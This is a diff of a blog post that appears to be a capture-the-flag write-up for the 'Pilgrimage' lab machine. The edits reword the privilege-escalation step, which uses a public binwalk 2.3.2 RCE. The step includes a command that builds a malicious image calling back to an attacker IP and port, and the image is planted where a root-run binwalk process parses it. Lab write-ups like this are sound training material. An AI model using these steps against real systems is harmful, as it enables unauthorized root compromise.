Mr-Dust0/Mr-Dust0.github.io/_posts/2023-11-25-Pilgrimage.md

 ```

 we see running `/usr/local/bin/binwalk` the version of binwalk is v2.3.2 and there is a
 [rce](https://www.exploit-db.com/exploits/51249) on this version.
-Which we can use to get privileges as root.If we run
+Which we can use to get privileges as root.
+If we run
 the `python3 exp.py /var/www/pilgrimage.htb/shrunk/6561bb2e1406b.png 10.10.14.3 1234
-` with exp.py being the exploit from the rce and then copy the created image to the /var/www/pilgrimage.htb/shrunk directory
+` with exp.py being the exploit from the link earlier.
+Then we can copy the created image to the /var/www/pilgrimage.htb/shrunk directory
-so that it triggers the inotify event create and executes the script and gives us a root privileges.
+so that it triggers the inotify event create and executes the script and gives us a root privileges because the image is
+passed into binwalk and gives us rce.

 ![img_8.png](/assets/img/pilgrimage/img_8.png)